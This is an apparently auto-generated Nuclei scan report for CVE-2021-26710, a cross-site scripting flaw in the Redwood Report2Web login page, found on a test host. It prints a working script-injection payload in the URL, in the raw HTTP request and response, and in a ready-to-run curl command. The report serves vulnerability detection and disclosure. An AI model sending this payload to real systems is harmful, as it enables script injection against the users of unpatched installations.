Redwood Report2Web 4.3.4.5 & 4.5.3 - Cross-Site Scripting (CVE-2021-26710) found on honey.scanme.sh

[mkrs2404]

Details: CVE-2021-26710 matched at honey.scanme.sh

Protocol: HTTP

Full URL: https://honey.scanme.sh/r2w/signIn.do?urll=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E

Timestamp: Tue Apr 30 13:42:07 +0000 UTC 2024

Source: https://cloud.projectdiscovery.io/vuln/83e37256a04bde38ebc95635fad1c2f5

Template Information

Key	Value
Name	Redwood Report2Web 4.3.4.5 & 4.5.3 - Cross-Site Scripting
Authors	pikpikcu
Tags	cve2021, cve, redwood, xss
Severity	medium
Description	Redwood Report2Web 4.3.4.5 and 4.5.3 contains a cross-site scripting vulnerability in the login panel which allows remote attackers to inject JavaScript via the signIn.do urll parameter.
Remediation	Upgrade to the latest version of Redwood Report2Web or apply the vendor-provided patch to fix the XSS vulnerability.
CVSS-Metrics	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE-ID	CWE-79
CVE-ID	CVE-2021-26710
CVSS-Score	6.10
vendor	redwood
product	report2web

Request

GET /r2w/signIn.do?urll=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
Host: honey.scanme.sh
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.1108.43 Safari/537.36 Edg/100.0.1108.43
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 330
Content-Type: text/html
Date: Tue, 30 Apr 2024 13:42:06 GMT

GET /r2w/signIn.do?urll="><script>alert(document.domain)</script> HTTP/1.1
Host: honey.scanme.sh
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.1108.43 Safari/537.36 Edg/100.0.1108.43

References:

• https://vict0ni.me/report2web-xss-frame-injection.html
• https://vict0ni.me/redwood-report2web-xss-and-frame-injection/
• https://nvd.nist.gov/vuln/detail/CVE-2021-26710
• https://github.com/ARPSyndicate/cvemon
• https://github.com/ARPSyndicate/kenzer-templates

CURL command

curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.1108.43 Safari/537.36 Edg/100.0.1108.43' 'https://honey.scanme.sh/r2w/signIn.do?urll=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E'

---

Generated by Nuclei v3.2.5